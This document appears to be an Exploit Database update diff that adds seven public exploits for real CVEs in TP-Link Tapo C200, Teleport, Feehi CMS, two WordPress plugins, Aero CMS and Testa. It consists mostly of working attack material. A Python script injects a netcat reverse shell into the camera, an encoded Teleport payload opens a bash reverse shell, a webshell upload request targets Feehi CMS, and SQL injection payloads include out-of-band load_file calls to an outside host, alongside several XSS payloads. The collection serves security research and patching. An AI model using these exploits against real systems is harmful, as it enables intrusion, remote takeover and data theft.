DB: 2022-09-24

7 changes to exploits/shellcodes

Teleport v10.1.1 - Remote Code Execution (RCE)
TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)
Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)
Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS)
Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS)
Aero CMS v0.0.1 - SQLi
Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)

Author: Offensive Security

exploits/hardware/webapps/51017.py

@@ -0,0 +1,32 @@
+# Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)
+# Date: 02/11/2022
+# Exploit Author: hacefresko
+# Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/
+# Version: 1.1.15 and below
+# Tested on: 1.1.11, 1.1.14 and 1.1.15
+# CVE : CVE-2021-4045
+
+# Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rce
+
+import requests, urllib3, sys, threading, os
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+PORT = 1337
+REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f'
+NC_COMMAND = 'nc -lv %d' % PORT # nc command to receive reverse shell (change it depending on your nc version)
+
+if len(sys.argv) < 3:
+    print("Usage: python3 pwnTapo.py <victim_ip> <attacker_ip>")
+    exit()
+
+victim = sys.argv[1]
+attacker = sys.argv[2]
+
+print("[+] Listening on %d" % PORT)
+t = threading.Thread(target=os.system, args=(NC_COMMAND,))
+t.start()
+
+print("[+] Serving payload to %s\n" % victim)
+url = "https://" + victim + ":443/"
+json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}}
+requests.post(url, json=json, verify=False)

exploits/multiple/remote/51019.txt

@@ -0,0 +1,19 @@
+# Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE)
+# Date: 08/01/2022
+# Exploit Author: Brandon Roach & Brian Landrum
+# Vendor Homepage: https://goteleport.com
+# Software Link: https://github.com/gravitational/teleport
+# Version: < 10.1.2
+# Tested on: Linux
+# CVE: CVE-2022-36633
+
+Proof of Concept (payload):
+https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2=
+f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3=
+0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?=
+method=3Diam
+
+
+Decoded payload:
+"
+/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #

exploits/php/webapps/51018.txt

@@ -0,0 +1,106 @@
+# Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)
+# Date: 22-08-2022
+# Exploit Author: yuyudhn
+# Vendor Homepage: https://feehi.com/
+# Software Link: https://github.com/liufee/cms
+# Version: 2.1.1 (REQUIRED)
+# Tested on: Linux, Docker
+# CVE : CVE-2022-34140
+
+
+
+# Proof of Concept:
+1. Login using admin account at http://feehi-cms.local/admin
+2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex
+3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate
+4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php.
+5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php
+
+# Burp request example:
+
+POST /admin/index.php?r=ad%2Fcreate HTTP/1.1
+Host: feehi-cms.local
+Content-Length: 1530
+Cache-Control: max-age=0
+sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://feehi-cms.local
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xg
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://feehi-cms.local/admin/index.php?r=ad%2Fcreate
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7D
+
+Connection: close
+
+
+
+------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
+
+Content-Disposition: form-data; name="_csrf_backend"
+
+
+
+FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg==
+
+------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
+
+Content-Disposition: form-data; name="AdForm[name]"
+
+
+
+rce
+
+------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
+
+Content-Disposition: form-data; name="AdForm[tips]"
+
+
+
+rce at Ad management
+
+------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
+
+Content-Disposition: form-data; name="AdForm[input_type]"
+
+
+
+1
+
+------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
+
+Content-Disposition: form-data; name="AdForm[ad]"
+
+
+
+
+
+------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
+
+Content-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php"
+
+Content-Type: image/png
+
+
+
+<?php phpinfo();
+
+
+
+------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
+
+Content-Disposition: form-data; name="AdForm[link]"
+
+
+
+
+
+--------------

exploits/php/webapps/51020.txt

@@ -0,0 +1,29 @@
+# Exploit Title: Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS)
+# Google Dork: inurl:/wp-content/plugins/wp-useronline/
+# Date: 2022-08-24
+# Exploit Author: UnD3sc0n0c1d0
+# Vendor Homepage: https://github.com/lesterchan/wp-useronline
+# Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip
+# Category: Web Application
+# Version: 2.88.0
+# Tested on: Debian / WordPress 6.0.1
+# CVE : CVE-2022-2941
+# Reference: https://github.com/lesterchan/wp-useronline/commit/59c76b20e4e27489f93dee4ef1254d6204e08b3c
+
+# 1. Technical Description:
+The WP-UserOnline plugin for WordPress has multiple Stored Cross-Site Scripting vulnerabilities in versions
+up to, and including 2.88.0. This is due to the fact that all fields in the “Naming Conventions” section do
+not properly sanitize user input, nor escape it on output. This makes it possible for authenticated attackers,
+with administrative privileges, to inject JavaScript code into the setting that will execute whenever a user
+accesses the injected page.
+
+# 2. Proof of Concept (PoC):
+  a. Install and activate version 2.88.0 of the plugin.
+  b. Go to the plugin options panel (http://[TARGET]/wp-admin/options-general.php?page=useronline-settings).
+  c. Identify the "Naming Conventions" section and type your payload in any of the existing fields. You can use
+ 	 the following payload:
+		<script>alert(/XSS/)</script>
+  d. Save the changes and now go to the Dashboard/WP-UserOnline option. As soon as you click here, your payload
+  	 will be executed.
+
+Note: This change will be permanent until you modify the edited fields.

exploits/php/webapps/51021.txt

@@ -0,0 +1,24 @@
+# Exploit Title: Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS)
+# Google Dork: inurl:/wp-content/plugins/3dady-real-time-web-stats/
+# Date: 2022-08-24
+# Exploit Author: UnD3sc0n0c1d0
+# Vendor Homepage: https://profiles.wordpress.org/3dady/
+# Software Link: https://downloads.wordpress.org/plugin/3dady-real-time-web-stats.zip
+# Category: Web Application
+# Version: 1.0
+# Tested on: Debian / WordPress 6.0.1
+# CVE : N/A
+
+# 1. Technical Description:
+The 3dady real-time web stats WordPress plugin is vulnerable to stored XSS. Specifically in the dady_input_text
+and dady2_input_text fields because the user's input is not properly sanitized which allows the insertion of
+JavaScript code that can exploit the vulnerability.
+
+# 2. Proof of Concept (PoC):
+  a. Install and activate version 1.0 of the plugin.
+  b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=3dady).
+  c. Insert the following payload in any of the visible fields (dady_input_text or dady2_input_text):
+		" autofocus onfocus=alert(/XSS/)>
+  d. Save the changes and immediately the popup window demonstrating the vulnerability (PoC) will be executed.
+
+  Note: This change will be permanent until you modify the edited fields.

exploits/php/webapps/51022.txt

@@ -0,0 +1,47 @@
+# Title: Aero CMS v0.0.1 - SQLi
+# Author: nu11secur1ty
+# Date: 08.27.2022
+# Vendor: https://github.com/MegaTKC
+# Software: https://github.com/MegaTKC/AeroCMS/releases/tag/v0.0.1
+# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/MegaTKC/2021/AeroCMS-v0.0.1-SQLi
+
+# Description:
+The `author` parameter from the AeroCMS-v0.0.1 CMS system appears to
+be vulnerable to SQL injection attacks.
+The malicious user can dump-steal the database, from this CMS system
+and he can use it for very malicious purposes.
+
+STATUS: HIGH Vulnerability
+
+[+]Payload:
+```mysql
+---
+Parameter: author (GET)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause
+    Payload: author=-5045' OR 8646=8646 AND 'YeVm'='YeVm&p_id=4
+
+    Type: error-based
+    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
+GROUP BY clause (FLOOR)
+    Payload: author=admin'+(select
+load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+''
+OR (SELECT 7539 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT
+(ELT(7539=7539,1))),0x7170716b71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'mwLN'='mwLN&p_id=4
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: author=admin'+(select
+load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+''
+AND (SELECT 6824 FROM (SELECT(SLEEP(5)))QfTF) AND 'zVTI'='zVTI&p_id=4
+
+    Type: UNION query
+    Title: MySQL UNION query (NULL) - 10 columns
+    Payload: author=admin'+(select
+load_file('\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\pvq'))+''
+UNION ALL SELECT
+NULL,NULL,CONCAT(0x717a6a6a71,0x4f617a456c7953617866546b7a666d49434d644662587149734b6d517a4e674d5471615a73616d58,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&p_id=4
+---
+
+```

exploits/php/webapps/51023.txt

@@ -0,0 +1,20 @@
+# Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)
+# Date: 28/08/2022
+# Exploit Author: Ashkan Moghaddas
+# Vendor Homepage: https://testa.cc
+# Software Link:
+https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip
+# Version: 3.5.1
+# Tested on: Windows/Linux
+
+# Proof of Concept:
+# 1- Install Testa 3.5.1
+# 2- Go to https://localhost.com/login.php?redirect=XXXX
+# 3- Add payload to the Tab, the XSS Payload:
+%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
+# 4- XSS has been triggered.
+
+# Go to this url "
+https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E
+"
+XSS will trigger.

files_exploits.csv

@@ -18727,6 +18727,7 @@ id,file,description,date,author,type,platform,port
 51011,exploits/linux/remote/51011.py,"Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE)",1970-01-01,"Samy Younsi",remote,linux,
 51015,exploits/ios/remote/51015.txt,"Wifi HD Wireless Disk Drive 11 - Local File Inclusion",1970-01-01,"Chokri Hammedi",remote,ios,
 51016,exploits/windows/remote/51016.sh,"WiFiMouse 1.8.3.4 - Remote Code Execution (RCE)",1970-01-01,"FEBIN MON SAJI",remote,windows,
+51019,exploits/multiple/remote/51019.txt,"Teleport v10.1.1 - Remote Code Execution (RCE)",1970-01-01,"Brandon Roach",remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@@ -45078,3 +45079,9 @@ id,file,description,date,author,type,platform,port
 51009,exploits/multiple/webapps/51009.rb,"Gitea 1.16.6 - Remote Code Execution (RCE) (Metasploit)",1970-01-01,samguy,webapps,multiple,
 51012,exploits/hardware/webapps/51012.txt,"Buffalo TeraStation Network Attached Storage (NAS) 1.66 - Authentication Bypass",1970-01-01,"Jordan Glover",webapps,hardware,
 51013,exploits/multiple/webapps/51013.txt,"Bookwyrm v0.4.3 - Authentication Bypass",1970-01-01,"Akshay Ravi",webapps,multiple,
+51017,exploits/hardware/webapps/51017.py,"TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)",1970-01-01,hacefresko,webapps,hardware,
+51018,exploits/php/webapps/51018.txt,"Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,yuyudhn,webapps,php,
+51020,exploits/php/webapps/51020.txt,"Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS)",1970-01-01,UnD3sc0n0c1d0,webapps,php,
+51021,exploits/php/webapps/51021.txt,"Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS)",1970-01-01,UnD3sc0n0c1d0,webapps,php,
+51022,exploits/php/webapps/51022.txt,"Aero CMS v0.0.1 - SQLi",1970-01-01,nu11secur1ty,webapps,php,
+51023,exploits/php/webapps/51023.txt,"Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)",1970-01-01,"Ashkan Moghaddas",webapps,php,